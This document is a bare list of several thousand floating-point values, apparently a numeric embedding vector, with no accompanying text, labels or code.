0.02101477049291134, -0.03190290555357933, 0.008877504616975784, 0.014281493611633778, -0.02124188467860222, 0.02023990824818611, -0.035242825746536255, 0.01596481166779995, -0.024381408467888832, -0.044300682842731476, -0.02414093352854252, 0.012658292427659035, 0.009926239028573036, -0.0018653447041288018, 0.024608522653579712, -0.012731770984828472, -0.025142909958958626, 0.016793111339211464, -0.010594222694635391, -0.019237933680415154, -0.01824931614100933, 0.009872800670564175, 0.03724677488207817, 0.010206792503595352, 0.012411138974130154, 0.041014205664396286, 0.011469281278550625, 0.006362545304000378, 0.03556345775723457, -0.009505408816039562, 0.028910337015986443, 0.04996518790721893, 0.007287702988833189, -0.021094927564263344, -0.015083073638379574, -0.0008015805506147444, 0.008075923658907413, -0.002743743360042572, 0.019237933680415154, -0.04039965942502022, -0.003408387303352356, -0.00845667440444231, -0.04432740435004234, -0.00042917957762256265, -0.0035469939466565847, -0.005036597605794668, 0.005016558337956667, -0.04299143701791763, 0.012277541682124138, -0.002571737626567483, 0.02955160290002823, -0.031983062624931335, -0.022898484021425247, -0.0009735863422974944, -0.012564774602651596, -0.01616520807147026, 0.03267776593565941, 0.00013056995521765202, 0.0010186752770096064, 0.044167086482048035, -0.005397309083491564, 0.03612456098198891, 0.006833474151790142, 0.007969046011567116, -0.0077619715593755245, 0.01983911730349064, 0.01038046833127737, 0.01942496746778488, 0.004341894760727882, -0.0027103442698717117, 0.018623387441039085, -0.027253737673163414, -0.014521967619657516, -0.01209050603210926, -0.03388013690710068, -0.0045456294901669025, 0.007461378816515207, 0.004558989312499762, 0.001673299353569746, -0.020253269001841545, -0.006900272332131863, 0.008810706436634064, -0.016138488426804543, -0.013286197558045387, -0.017835166305303574, -0.005427367985248566, 0.007982405833899975, 0.023259194567799568, -0.011295605450868607, -0.027681248262524605, -0.003298169933259487, -0.004926380235701799, -0.03860946372151375, -0.02923097088932991, 0.010420546866953373, 0.02909737266600132, -0.00804920494556427, -0.0068267942406237125, -0.013105841353535652, 0.0054206885397434235, -0.014735721983015537, -0.02186978980898857, 0.00074647186556831, 0.018970739096403122, -0.007414619904011488, -0.017781728878617287, 0.006242308299988508, -0.0033232192508876324, -0.033612944185733795, -0.04349910467863083, -0.019197853282094002, -0.009485369548201561, -0.004315175116062164, -0.013159280642867088, -0.022070184350013733, 0.008463354781270027, 0.025850972160696983, 0.007020509336143732, 0.010894815437495708, 0.017875246703624725, 0.03355950489640236, -0.013613509014248848, -0.011522720567882061, 0.015537302941083908, 0.012644932605326176, -0.008035845123231411, -0.015189951285719872, 0.014054378494620323, 0.005444067995995283, -0.00979264173656702, -0.0016783092869445682, -0.014441809616982937, 0.007868848741054535, -0.014495247974991798, -0.022203780710697174, -0.005036597605794668, 0.004198277834802866, -0.014067738316953182, -0.0319296233355999, -0.017995482310652733, 0.027814844623208046, -0.05103395879268646, -0.010333709418773651, 0.010828017257153988, 0.0336931012570858, -0.009639006108045578, -0.011703075841069221, -0.019304731860756874, 0.018035562708973885, -0.01062094233930111, 0.008877504616975784, 0.04852234199643135, -0.022738168016076088, 0.0016357252607122064, 0.02372678369283676, 0.02203010581433773, -0.006492802407592535, 0.012511336244642735, -0.01951848529279232, 0.002678615041077137, -0.02941800467669964, 0.023806942626833916, 0.021843070164322853, -0.023272555321455002, -0.015911374241113663, -0.02850954793393612, 0.004786103963851929, 0.007862169295549393, -0.047426849603652954, 0.013306236825883389, -0.028135476633906364, 0.0038008277770131826, -0.027227018028497696, 0.01306576281785965, -0.011208768002688885, 0.007782010827213526, 0.024381408467888832, 0.006135431118309498, -0.01098165288567543, 0.016245365142822266, 0.0058081187307834625, -0.01052742451429367, -0.022457614541053772, -0.0024782198015600443, 0.02724037878215313, 0.006649778690189123, 0.018142439424991608, 0.009739203378558159, 0.04929720237851143, 0.04389989376068115, 0.027253737673163414, -0.006536221131682396, -0.017648130655288696, 0.02701326459646225, 0.0001749282528180629, -0.04002558812499046, -0.0004538114881142974, 0.01997271552681923, 0.005601043812930584, -0.011295605450868607, -0.00724094407632947, -0.0037908079102635384, -0.02981879562139511, -0.01305240299552679, 0.04598400369286537, -0.001172311487607658, -0.021428920328617096, 0.021175086498260498, 0.01573769748210907, -0.01795540377497673, -0.009171416983008385, 0.02834923192858696, 0.019104335457086563, 0.0441938079893589, -0.016378961503505707, -0.005156834609806538, -0.02277824655175209, 0.02323247492313385, -0.0044721513986587524, -0.018823781982064247, 0.01838291436433792, -0.004505550488829613, 0.023259194567799568, -0.04451444000005722, 0.006636418867856264, -0.013606829568743706, -0.012865367345511913, -0.0057613602839410305, 0.005838178098201752, -0.009124658070504665, -0.006385924760252237, 0.01942496746778488, 0.028162196278572083, -0.003931084647774696, 0.0038776458241045475, 0.01840963214635849, -0.02232401818037033, 0.002718694042414427, 0.01603160984814167, 0.0006750811007805169, 0.0061454507522284985, 0.006395944859832525, 0.017928684130311012, 0.011850032024085522, 0.028456108644604683, -0.009525449015200138, -0.02760108932852745, 0.0071541061624884605, -0.00009278712241211906, 0.002217706060037017, 0.013606829568743706, 0.017875246703624725, -0.024581803008913994, -0.017554612830281258, 0.02169611304998398, -0.045796968042850494, 0.00933841336518526, 0.051568347960710526, 0.0001639691472519189, -0.006566280499100685, 0.0019388229120522738, 0.009585566818714142, -0.0036805905401706696, 0.008496753871440887, -0.013947500847280025, -0.030166147276759148, -0.04245704784989357, -0.01180995348840952, -0.009138017892837524, -0.003550333669409156, 0.019010817632079124, 0.005781399551779032, 0.022457614541053772, -0.01060758251696825, -0.003510254668071866, -0.018396273255348206, 0.01664615608751774, 0.009331732988357544, 0.0009552168194204569, -0.0014077757950872183, -0.02850954793393612, -0.023539748042821884, 0.023446230217814445, 0.01080129761248827, -0.005884937010705471, -0.008022485300898552, 0.008590271696448326, -0.03575049340724945, -0.028162196278572083, 0.01609840989112854, 0.010473985224962234, 0.0027454132214188576, 0.019772319123148918, -0.014067738316953182, 0.004064681474119425, 0.03013942763209343, 0.003276460338383913, -0.038368988782167435, -0.018356194719672203, 0.020360145717859268, -0.02010631188750267, 0.006302427034825087, 0.023352712392807007, 0.01064098160713911, -0.043712858110666275, -0.011923510581254959, 0.02336607314646244, 0.027494212612509727, 0.006081992294639349, -0.0194516871124506, -0.0000677377320243977, -0.018810423091053963, 0.010059835389256477, -0.00020665748161263764, -0.0031361838337033987, -0.01883714273571968, -0.0038075074553489685, 0.0021559176966547966, -0.007574935909360647, 0.032276976853609085, -0.005343870259821415, 0.008349796757102013, -0.003727349452674389, -0.0006525366334244609, 0.006796734873205423, 0.012477937154471874, 0.016071690246462822, 0.008222879841923714, 0.015376986935734749, 0.0018837142270058393, -0.016365602612495422, -0.03190290555357933, -0.00247988966293633, 0.008102643303573132, 0.004438752308487892, -0.0034968950785696507, 0.000708480307366699, 0.025623857975006104, 0.0036037724930793047, 0.003777448320761323, -0.010647661052644253, 0.010327029041945934, 0.004746024962514639, 0.017287420108914375, -0.02072085626423359, -0.0000327207671944052, -0.00939853210002184, -0.027654528617858887, 0.010066515766084194, 0.014775801450014114, 0.009111299179494381, -0.04988502711057663, -0.012865367345511913, -0.00971248373389244, -0.006065292749553919, -0.0004642487328965217, -0.027333896607160568, -0.013339635916054249, -0.01052742451429367, -0.01520331110805273, 0.006800075061619282, -0.006796734873205423, -0.016886629164218903, -0.005263712257146835, 0.06284391134977341, 0.03834226727485657, 0.012751810252666473, 0.026465516537427902, -0.03759412840008736, -0.019465047866106033, 0.04718637466430664, 0.013239438645541668, 0.013800544664263725, -0.008516793139278889, 0.022270578891038895, -0.006873553153127432, -0.009144698269665241, -0.010547463782131672, 0.001324277836829424, 0.02169611304998398, -0.016632795333862305, -0.013413114473223686, 0.009665724821388721, 0.005601043812930584, 0.004518910311162472, 0.018783703446388245, -0.00043961682240478694, 0.010694419965147972, 0.0066831777803599834, -0.009445291012525558, -0.026438798755407333, 0.008236239664256573, -0.006165490485727787, 0.002606806578114629, -0.010647661052644253, -0.03235713392496109, -0.013433153741061687, -0.011061811819672585, 0.01301900390535593, 0.016445759683847427, 0.012965565547347069, -0.01199030876159668, -0.005941715557128191, -0.006519521586596966, 0.021295322105288506, -0.020052872598171234, 0.009799322113394737, 0.0075615765526890755, -0.01899745874106884, -0.027414053678512573, 0.02427452988922596, 0.017354218289256096, -0.02968519926071167, -0.009572207927703857, 0.0020440304651856422, -0.015216669999063015, 0.03724677488207817, 0.004786103963851929, -0.015911374241113663, 0.019157774746418, -0.0045556495897471905, 0.014375010505318642, -0.0008967682369984686, -0.02939128689467907, 0.010367108508944511, 0.022858405485749245, 0.007675133645534515, -0.0001484176464146003, 0.014508607797324657, -0.011616237461566925, -0.01306576281785965, 0.010453945957124233, 0.00705390889197588, 0.001284198835492134, 0.04512898251414299, 0.01212390512228012, 0.013606829568743706, 0.00011689715756801888, 0.002030670642852783, 0.0028556305915117264, 0.014348291791975498, -0.005925016012042761, 0.0117631945759058, -0.029711918905377388, -0.0006145450752228498, -0.004575688857585192, -0.01543042529374361, 0.006112051662057638, 0.005373929627239704, -0.013827264308929443, -0.004398673307150602, -0.001239944831468165, 0.019571924582123756, 0.0058081187307834625, 0.010079875588417053, 0.018730266019701958, 0.0018386252922937274, -0.04523586109280586, 0.015751058235764503, 0.023539748042821884, 0.019692162051796913, 0.0008412420866079628, -0.01938488893210888, -0.0023780222982168198, -0.014214694499969482, 0.007695172913372517, 0.009578887373209, 0.020801015198230743, -0.01293884590268135, 0.00004970738518750295, 0.014588765799999237, 0.019117696210741997, -0.00923821609467268, 0.02952488325536251, -0.025530340149998665, -0.017634771764278412, 0.011662996374070644, -0.030513498932123184, -0.010727819055318832, -0.007815410383045673, 0.006913632154464722, -0.015002915635704994, 0.010113274678587914, -0.007768651470541954, -0.027267098426818848, 0.016793111339211464, -0.004158198833465576, -0.00723426416516304, 0.013586790300905704, 0.0097258435562253, -0.003830886911600828, -0.030085990205407143, 0.020547181367874146, 0.01720726303756237, 0.039250727742910385, 0.024715399369597435, 0.0030159468296915293, 0.031208202242851257, -0.000769016332924366, -0.010079875588417053, 0.00597845483571291, -0.010714460164308548, 0.02802859991788864, 0.006860193330794573, 0.009892839938402176, 0.03147539496421814, 0.01811571978032589, 0.0014102807035669684, 0.002531658625230193, -0.008496753871440887, -0.008777306415140629, 0.032276976853609085, 0.013306236825883389, -0.007568255998194218, 0.01084805652499199, -0.013172640465199947, -0.012030388228595257, 0.004809483420103788, -0.011769874021410942, -0.020213188603520393, -0.011689716018736362, -0.010627621784806252, -0.0015063034370541573, 0.0006800909759476781, 0.011175368912518024, 0.01971888169646263, 0.022177061066031456, -0.002586767077445984, 0.018289396539330482, 0.014054378494620323, -0.005544265266507864, -0.03730021417140961, -0.042804401367902756, -0.004989838693290949, 0.013626868836581707, -0.0037340293638408184, -0.01319935917854309, 0.004271756391972303, 0.010153353214263916, 0.03000583127140999, -0.038956813514232635, 0.0006120401085354388, -0.010133313946425915, -0.0009201476350426674, 0.005049957428127527, 0.030166147276759148, 0.013606829568743706, -0.02760108932852745, 0.0023279234301298857, -0.01786188594996929, -0.0004425392544362694, 0.014829239808022976, -0.030780691653490067, 0.011081851087510586, -0.005664502270519733, 0.02789500169456005, -0.010681060142815113, -0.0012524696066975594, 0.000895933248102665, 0.006225608754903078, -0.015376986935734749, 0.00024986767675727606, 0.0022010065149515867, -0.024942513555288315, -0.022444255650043488, -0.012598173692822456, -0.002653565490618348, 0.01580449566245079, 0.015751058235764503, -0.020507102832198143, -0.010146673768758774, 0.004552309401333332, 0.0019121036166325212, 0.008543512783944607, 0.022885125130414963, 0.006001834291964769, -0.014855959452688694, -0.013760466128587723, 0.0209212526679039, -0.0028522906359285116, -0.0005535915843211114, -0.022631291300058365, -0.00800244603306055, -0.041922662407159805, 0.007327781990170479, 0.012330980971455574, 0.00961228646337986, 0.002656905446201563, 0.008917583152651787, 0.015270109288394451, 0.026278480887413025, -0.03588408976793289, -0.004138159565627575, 0.011409162543714046, 0.00861699040979147, -0.011228807270526886, 0.0036739108618348837, -0.01410781778395176, -0.015764417126774788, -0.01603160984814167, -0.005193573888391256, 0.02001279406249523, 0.009218175895512104, -0.013366355560719967, -0.02880346029996872, -0.017287420108914375, -0.02173619158565998, 0.005213613156229258, 0.004739345051348209, -0.00030017521930858493, -0.017701569944620132, 0.0016657845117151737, 0.0029808776453137398, -0.004194938112050295, -0.017260700464248657, -0.010046475566923618, 0.012357699684798717, -0.005053297150880098, -0.009492049925029278, -0.006269027944654226, -0.021268604323267937, -0.0037173298187553883, -0.001960532274097204, -0.010400507599115372, 0.0022444254718720913, -0.035269543528556824, -0.0027103442698717117, 0.00595507537946105, -0.016606077551841736, 0.03102116659283638, -0.011769874021410942, -0.016405681148171425, -0.024608522653579712, 0.015417065471410751, -0.0005289596738293767, 0.021522438153624535, 0.02547690086066723, -0.029738638550043106, -0.016245365142822266, 0.01573769748210907, -0.0014904388226568699, -0.008763947524130344, 0.027133500203490257, 0.00470928568392992, 0.035269543528556824, -0.0034801955334842205, -0.019264651462435722, -0.04796123504638672, 0.005230313166975975, -0.0017868565628305078, 0.003506914945319295, -0.039704956114292145, -0.025370024144649506, -0.009779282845556736, -0.027360616251826286, 0.008910903707146645, -0.0051401350647211075, -0.00808260403573513, -0.00719418516382575, 0.005290431436151266, -0.008991061709821224, 0.001927133183926344, -0.025076111778616905, -0.009291654452681541, 0.021228523924946785, 0.022497693076729774, 0.03812851384282112, -0.005901636555790901, -0.025690656155347824, 0.023339353501796722, -0.009872800670564175, -0.010327029041945934, 0.0029792075511068106, 0.0143883703276515, -0.004084720741957426, -0.004381973762065172, 0.007842129096388817, 0.0032447311095893383, -0.027574369683861732, -0.022297298535704613, -0.01906425692141056, 0.015096433460712433, 0.007928967475891113, 0.0036638909950852394, -0.0017885265406221151, -0.003027636557817459, -0.03246401250362396, 0.00004237522080074996, -0.012811928987503052, 0.0049530998803675175, 0.005644463002681732, -0.013059082441031933, 0.009972997941076756, -0.00007540910883108154, -0.010761219076812267, 0.00716078607365489, -0.009358452633023262, -0.0012583144707605243, -0.001599821145646274, -0.00983940064907074, 0.022658009082078934, -0.02293856255710125, -0.03959807753562927, 0.021362120285630226, -0.0058081187307834625, 0.002521638758480549, -0.009325053542852402, 0.023379432037472725, -0.008029164746403694, 0.018062280490994453, 0.04181578382849693, 0.005467447452247143, -0.03559017553925514, -0.03307855501770973, 0.00072517991065979, 0.009064540266990662, 0.00299757719039917, -0.0012825288577005267, -0.02088117226958275, 0.002169277286157012, -0.005360569804906845, 0.04189594089984894, -0.013005644083023071, -0.011308965273201466, -0.006866873241961002, -0.00834311731159687, -0.013219399377703667, 0.004538949579000473, -0.025076111778616905, -0.0025366684421896935, -0.009986357763409615, -0.00006883364403620362, 0.012705051340162754, 0.0035703734029084444, 0.0034634959883987904, -0.0021275284234434366, -0.011389123275876045, -0.004121460020542145, 0.01802220195531845, 0.02398061752319336, 0.029792075976729393, -0.007962366566061974, -0.003141193650662899, 0.027707967907190323, -0.0281889159232378, -0.011536079458892345, -0.008463354781270027, 0.00804920494556427, 0.0013251127675175667, 0.005771379917860031, -0.010774577967822552, 0.001092988415621221, 0.014735721983015537, -0.005524225998669863, -0.000042192568798782304, -0.00011313975119264796, -0.004311835393309593, 0.032437290996313095, -0.03575049340724945, 0.030192866921424866, 0.013546710833907127, 0.011516040191054344, -0.0019488426623865962, -0.02424781024456024, 0.022404175251722336, -0.0006742461118847132, -0.006810094695538282, 0.01316596008837223, -0.01609840989112854, -0.010266910307109356, 0.00842327531427145, -0.000988616026006639, 0.013840624131262302, -0.019211214035749435, 0.013192679733037949, 0.0010345398914068937, 0.022377457469701767, 0.0331052765250206, 0.0034100571647286415, -0.020814374089241028, -0.0011597868287935853, -0.005527565721422434, -0.000736869580578059, 0.02414093352854252, 0.005517546087503433, -0.00025341633590869606, 0.004585708491504192, -0.018102360889315605, 0.03329231217503548, -0.013045723550021648, 0.014896037988364697, 0.01520331110805273, -0.05375933274626732, 0.023045441135764122, 0.0024097515270113945, 0.022898484021425247, -0.0015864614397287369, 0.005243672523647547, -0.0041481791995465755, 0.004398673307150602, -0.01951848529279232, -0.025236427783966064, -0.003747388953343034, -0.005968435201793909, 0.008449994958937168, -0.002180967014282942, -0.023406151682138443, 0.011816632933914661, 0.011582838371396065, -0.013693667016923428, -0.005173534154891968, 0.006269027944654226, -0.016111768782138824, -0.03460155799984932, 0.026278480887413025, 0.0014954486396163702, -0.021949946880340576, 0.0165526382625103, -0.016565997153520584, 0.008797346614301205, 0.028750021010637283, -0.012397779151797295, -0.003964483737945557, 0.023352712392807007, -0.006412644404917955, -0.008670429699122906, 0.009899519383907318, -0.002580087399110198, -0.002820561407133937, 0.04943079873919487, -0.010854735970497131, -0.014896037988364697, -0.002082439372316003, 0.006489462219178677, 0.004365274216979742, 0.012878727167844772, 0.013760466128587723, 0.003707309952005744, 0.003951123915612698, -0.014041018672287464, 0.0008337272447533906, -0.005651142913848162, 0.008142721839249134, -0.0010512394364923239, 0.036445196717977524, -0.005400648806244135, -0.0013735416578128934, 0.0003496477729640901, -0.01623200625181198, 0.032704487442970276, 0.013974220491945744, -0.014495247974991798, -0.012591494247317314, 0.0018419652478769422, 0.00830971822142601, -0.00811600312590599, -0.005681201815605164, 0.013573430478572845, -0.0038375668227672577, 0.02760108932852745, 0.013920782133936882, 0.025036031380295753, 0.002448160434141755, 0.014201334677636623, -0.006663138046860695, -0.01194354984909296, 0.01698014698922634, 0.01543042529374361, -0.011268886737525463, 0.017621412873268127, 0.006866873241961002, 0.004188258200883865, -0.008590271696448326, -0.002287844428792596, 0.015417065471410751, 0.008910903707146645, 0.0041348193772137165, 0.0017033586045727134, -0.015978172421455383, 0.007868848741054535, -0.01668623462319374, 0.0034017073921859264, -0.008817385882139206, -0.018289396539330482, 0.01317931991070509, 0.0020206510089337826, -0.015216669999063015, -0.02105484902858734, 0.008095962926745415, 0.0018954039551317692, 0.011529400013387203, -0.01557738147675991, -0.004255056846886873, -0.01664615608751774, 0.02216370217502117, 0.006866873241961002, -0.004391993395984173, -0.02508947066962719, -0.010260230861604214, -0.007307742722332478, -0.0029257689602673054, -0.01645912043750286, -0.017648130655288696, 0.024715399369597435, 0.009832721203565598, -0.018970739096403122, 0.01160287857055664, 0.0035737131256610155, -0.026438798755407333, 0.005397309083491564, 0.020520461723208427, -0.020480383187532425, -0.028375951573252678, 0.03225025534629822, -0.02003951370716095, -0.022337377071380615, -0.009832721203565598, -0.01535026729106903, 0.0065429010428488255, 0.002444820711389184, -0.030647095292806625, -0.004528929945081472, 0.012244142591953278, 0.01099501270800829, 0.00826295930892229, -0.0013902412028983235, 0.02952488325536251, 0.00036676484160125256, -0.017461096867918968, 0.02216370217502117, 0.004989838693290949, 0.01827603578567505, 0.002197666559368372, -0.00358373299241066, 0.0030109367799013853, 0.008142721839249134, -0.0002166772319469601, -0.0017334178555756807, 0.005831498187035322, -0.008109322749078274, 0.023419510573148727, -0.029765356332063675, 0.005884937010705471, -0.008109322749078274, 0.011349044740200043, -0.0029758678283542395, -0.008022485300898552, -0.037781164050102234, -0.01840963214635849, 0.0010353748220950365, -0.012885406613349915, -0.0021308681461960077, -0.005430708173662424, 0.00923821609467268, 0.025142909958958626, 0.014588765799999237, -0.0030727253761142492, -0.004308495204895735, -0.016205286607146263, 0.002820561407133937, 0.003154553472995758, -0.025557059794664383, 0.025717375800013542, -0.0014344952069222927, 0.01759469322860241, -0.00716746598482132, -0.0017284080386161804, -0.001275849062949419, -0.015791136771440506, -0.00469926605001092, 0.028910337015986443, -0.012290901504456997, -0.01195690967142582, -0.0018486451590433717, -0.0007623364799655974, -0.01716718263924122, 0.0022895142901688814, 0.00011240914318477735, 0.017608052119612694, 0.02019982971251011, 0.017087025567889214, 0.005257032345980406, 0.014802520163357258, -0.015617460943758488, 0.00931837409734726, 0.005430708173662424, 0.004398673307150602, 0.02017311006784439, 0.0005343870143406093, 0.009826041758060455, 0.022764887660741806, -0.009585566818714142, 0.004842882510274649, -0.005570984911173582, 0.009558848105370998, -0.004689245950430632, -0.008964342065155506, 0.0027671228162944317, 0.021856429055333138, 0.010347068309783936, -0.008857465349137783, 0.006155470386147499, -0.00230955402366817, -0.012364380061626434, -0.00489632086828351, -0.00946533028036356, -0.006335826124995947, -0.029177531599998474, 0.008349796757102013, -0.004705945495516062, 0.004632467404007912, 0.02003951370716095, -0.012297580949962139, -0.00010306781041435897, 0.014361651614308357, 0.016899989917874336, -0.01782180741429329, 0.008029164746403694, -0.010600902140140533, 0.003580393036827445, -0.02414093352854252, -0.02893705666065216, 0.011442562565207481, 0.015189951285719872, 0.02023990824818611, 0.009057859890162945, -0.012290901504456997, -0.006302427034825087, -0.005313810892403126, 0.0011564468732103705, -0.0040747011080384254, 0.006399284582585096, 0.010447266511619091, 0.023873740807175636, -0.0010771238012239337, 0.022043464705348015, 0.02108156867325306, 0.0001576024224050343, -0.015537302941083908, -0.016859911382198334, 0.0009685764671303332, -0.016312163323163986, -0.0264254380017519, -0.005133455153554678, 0.005510866176337004, 0.006449383217841387, 0.01401429995894432, 0.013192679733037949, -0.0013768816133961082, 0.007488097995519638, 0.007982405833899975, 0.014949477277696133, 0.0022861745674163103, 0.007033869158476591, -0.013112521730363369, 0.015924733132123947, -0.0032213516533374786, 0.008369836956262589, -0.0064026243053376675, -0.01316596008837223, -0.000761919014621526, -0.015857934951782227, 0.0267193503677845, -0.0014495247742161155, -0.012578134424984455, -0.005046617239713669, -0.0038809857796877623, 0.023219116032123566, 0.017621412873268127, 0.0012474596733227372, 0.023472949862480164, 0.009632325731217861, 0.006596339866518974, -0.012932165525853634, 0.01730077899992466, 0.024167653173208237, 0.011836672201752663, 0.008997741155326366, 0.0068267942406237125, -0.0162587258964777, -0.05017894133925438, -0.025623857975006104, -0.013840624131262302, -0.00485624186694622, 0.004051321651786566, 0.01197694893926382, -0.004956439603120089, -0.009144698269665241, -0.012691691517829895, -0.006105371750891209, -0.0007072278531268239, -0.022698089480400085, 0.018289396539330482, 0.01723398081958294, 0.028375951573252678, 0.010694419965147972, 0.01209050603210926, -0.005206933710724115, -0.000023366384994005784, -0.016312163323163986, 0.007882208563387394, -0.024221092462539673, 0.005768039729446173, -0.0188638623803854, 0.030540218576788902, -0.0035403140354901552, 0.015176591463387012, -0.010093234479427338, -0.003383337752893567, 0.005126775708049536, 0.002793842228129506, 0.014949477277696133, -0.00727434316650033, 0.00724094407632947, -0.0028573006857186556, 0.024648601189255714, 0.010213471949100494, -0.0005193573888391256, -0.002279494656249881, -0.009345092810690403, 0.00043168451520614326, -0.012117225676774979, 0.019184494391083717, -0.0012174004223197699, 0.011088530533015728, 0.00939853210002184, -0.01906425692141056, -0.0065429010428488255, 0.012578134424984455, -0.012017028406262398, -0.011482641100883484, -0.0023897120263427496, -0.002571737626567483, -0.005811458919197321, -0.004128139931708574, -0.012404458597302437, 0.01850314997136593, 0.013920782133936882, -0.009472009725868702, -0.016766393557190895, 0.017060305923223495, 0.0021175085566937923, 0.005300451070070267, 0.002735393587499857, 0.002935788594186306, -0.005554284900426865, 0.0016925039235502481, 0.006385924760252237, -0.0024498305283486843, -0.016699593514204025, 0.009785962291061878, -0.0008195326081477106, -0.02316567674279213, 0.0023513028863817453, -0.003904365235939622, -0.016085049137473106, -0.02805531956255436, 0.013907422311604023, 0.001862004748545587, 0.010260230861604214, -0.0013192679034546018, 0.01179659366607666, 0.0065429010428488255, -0.016178566962480545, -0.010781258344650269, -0.012344339862465858, -0.020814374089241028, -0.028589705005288124, 0.014121176674962044, -0.0002164684992749244, -0.0031846126075834036, 0.008149402216076851, -0.011562799103558064, -0.01951848529279232, 0.005911656655371189, 0.005838178098201752, 0.010367108508944511, -0.018102360889315605, -0.035830650478601456, 0.007708532735705376, -0.0325174517929554, 0.021335402503609657, 0.022631291300058365, 0.020667418837547302, -0.000799910572823137, -0.013286197558045387, 0.00032167593599297106, -0.02472876012325287, -0.019398249685764313, -0.03548329696059227, -0.018235957249999046, -0.008369836956262589, -0.006846833508461714, -0.012210743501782417, -0.011248846538364887, -0.0035369740799069405, -0.029177531599998474, -0.01641904190182686, 0.0012641593348234892, -0.008055884391069412, -0.0188638623803854, 0.017474455758929253, -0.014268133789300919, -0.021041488274931908, -0.028856899589300156, -0.008429955691099167, 0.01958528347313404, 0.00858359131962061, -0.0031979724299162626, -0.0036238119937479496, -0.00021198047033976763, -0.012451217509806156, 0.0004955604672431946, -0.019732240587472916, 0.001532187801785767, -0.015657540410757065, 0.005741320550441742, 0.004752704408019781, -0.02072085626423359, 0.001907093683257699, -0.015069713816046715, -0.0038676259573549032, -0.020774295553565025, -0.012544735334813595, 0.032704487442970276, 0.005751340184360743, 0.012852007523179054, -0.01520331110805273, 0.01559074129909277, 0.002087449189275503, 0.006689857691526413, -0.011435882188379765, -0.009585566818714142, 0.007060588337481022, 0.00365721108391881, 0.011689716018736362, -0.003415066981688142, -0.01720726303756237, 0.008750587701797485, 0.003064375603571534, 0.021362120285630226, 0.006132090929895639, -0.039731673896312714, 0.011349044740200043, -0.0017000187654048204, 0.009986357763409615, -0.018663465976715088, 0.012725090608000755, 0.0032063222024589777, -0.001605666009709239, 0.00461242813616991, -0.0008320572669617832, -0.012584814801812172, -0.03398701548576355, -0.032731205224990845, 0.015042995102703571, 0.008449994958937168, 0.015523943118751049, 0.02789500169456005, 0.008216200396418571, -0.016699593514204025, 0.006900272332131863, 0.01156947948038578, 0.018235957249999046, 0.0032013121526688337, -0.006469422951340675, -0.0056210835464298725, 0.002292854245752096, 0.0005026577855460346, 0.011061811819672585, 0.008349796757102013, 0.016071690246462822, -0.014562046155333519, 0.0044020130299031734, 0.02538338303565979, 0.0039611440151929855, -0.020533820614218712, -0.007254303898662329, 0.018529869616031647, 0.017260700464248657, -0.01052742451429367, -0.004418712574988604, 0.00029245164478197694, 0.024287890642881393, 0.03131508082151413, 0.0014779141638427973, 0.013159280642867088, 0.0212151650339365, -0.01863674819469452, 0.006653118412941694, 0.02209690399467945, 0.02506275102496147, -0.01844971254467964, -0.00704722898080945, -0.022337377071380615, 0.014989555813372135, 0.0010854736901819706, -0.0037139898631721735, -0.012063787318766117, -0.012224103324115276, 0.01694006845355034, -0.019278012216091156, -0.02219042181968689, 0.0036405115388333797, -0.004973139148205519, -0.007701852824538946, -0.014081098139286041, -0.02499595284461975, -0.0027203639037907124, -0.000023901295207906514, 0.0027120141312479973, 0.003850926412269473, 0.012317621149122715, 0.0029174191877245903, -0.012431178241968155, 0.006719916593283415, 0.011502680368721485, 0.0017501175170764327, 0.0018853842047974467, -0.003954464104026556, -0.006679837591946125, -0.006168830208480358, 0.045209143310785294, -0.01544378511607647, 0.009211496450006962, -0.012544735334813595, 0.010453945957124233, 0.0061588105745613575, 0.012097186408936977, -0.004946419969201088, -0.0033198792953044176, 0.0027704627718776464, 0.01543042529374361, 0.02329927496612072, 0.0005736310849897563, -0.024060776457190514, -0.00812936294823885, -0.017046945169568062, -0.005076676607131958, 0.002558377804234624, -0.02984551526606083, 0.0010236850939691067, -0.031234921887516975, -0.004689245950430632, -0.007334461901336908, 0.0012015358079224825, -0.016966788098216057, 0.013960860669612885, 0.0031762628350406885, -0.007267663720995188, -0.01580449566245079, -0.011182048358023167, 0.029792075976729393, -0.0005815633921884, -0.015216669999063015, 0.009218175895512104, -0.0008404070977121592, -0.016659514978528023, 0.01691334880888462, -0.004071360919624567, -0.010427226312458515, 0.004355254117399454, -0.007568255998194218, 0.007187505252659321, 0.006920312065631151, -0.021976666525006294, -0.0019054237054660916, 0.006162150297313929, -0.0005239497986622155, 0.018984099850058556, -0.02597120963037014, 0.0010804637568071485, -0.00295248837210238, 0.0074079399928450584, -0.011195408180356026, -0.0071541061624884605, -0.011429202742874622, -0.034040454775094986, 0.020253269001841545, -0.0047426847741007805, -0.025370024144649506, 0.013787184841930866, -0.011723115108907223, 0.016138488426804543, -0.011322325095534325, 0.01470900233834982, 0.013226078823208809, 0.005283751524984837, -0.013419793918728828, -0.005707921460270882, 0.009438610635697842, 0.024835636839270592, 0.01199030876159668, 0.004522250033915043, -0.03412061184644699, -0.023058800026774406, -0.0054808068089187145, 0.0058214785531163216, 0.007321102079004049, -0.031047886237502098, 0.00048261828487738967, 0.013560070656239986, 0.019050898030400276, 0.0077619715593755245, 0.008269638754427433, -0.004208297934383154, -0.013633549213409424, 0.007040549069643021, -0.003199642291292548, 0.015230029821395874, 0.011228807270526886, 0.0033816678915172815, -0.019024178385734558, 0.009952958673238754, -0.006065292749553919, 0.008556872606277466, 0.003349938662722707, -0.008750587701797485, 0.008009125478565693, -0.010928214527666569, -0.004001223016530275, 0.005424028262495995, -0.01752789504826069, 0.018917299807071686, -0.016472479328513145, 0.0008558541885577142, 0.016085049137473106, 0.003248071065172553, -0.004979819059371948, 0.011375763453543186, -0.01854323036968708, 0.0074346596375107765, -0.01971888169646263, 0.005614403635263443, 0.018195878714323044, -0.016793111339211464, -0.005697901826351881, 0.004054661374539137, 0.03593752905726433, 0.008850784972310066, -0.02042694389820099, -0.001673299353569746, -0.005226972978562117, -0.011516040191054344, 0.00022648824960924685, -0.0037674284540116787, 0.029177531599998474, -0.005711261183023453, -0.0003314869536552578, 0.01743437722325325, -0.0051969136111438274, 0.004946419969201088, -0.00295749818906188, -0.006248988211154938, -0.005567644722759724, 0.005798099096864462, 0.011075170710682869, -0.014789161272346973, -0.029177531599998474, 0.00009085622878046706, -0.002084109466522932, 0.014829239808022976, 0.021455638110637665, -0.02339279279112816, 0.008944302797317505, 0.009979677386581898, -0.011823313310742378, -0.015817856416106224, 0.02320575714111328, 0.01759469322860241, -0.002419771160930395, 0.018329475075006485, -0.021455638110637665, 0.0267193503677845, -0.0011163678718730807, -0.006733276415616274, 0.007935646921396255, 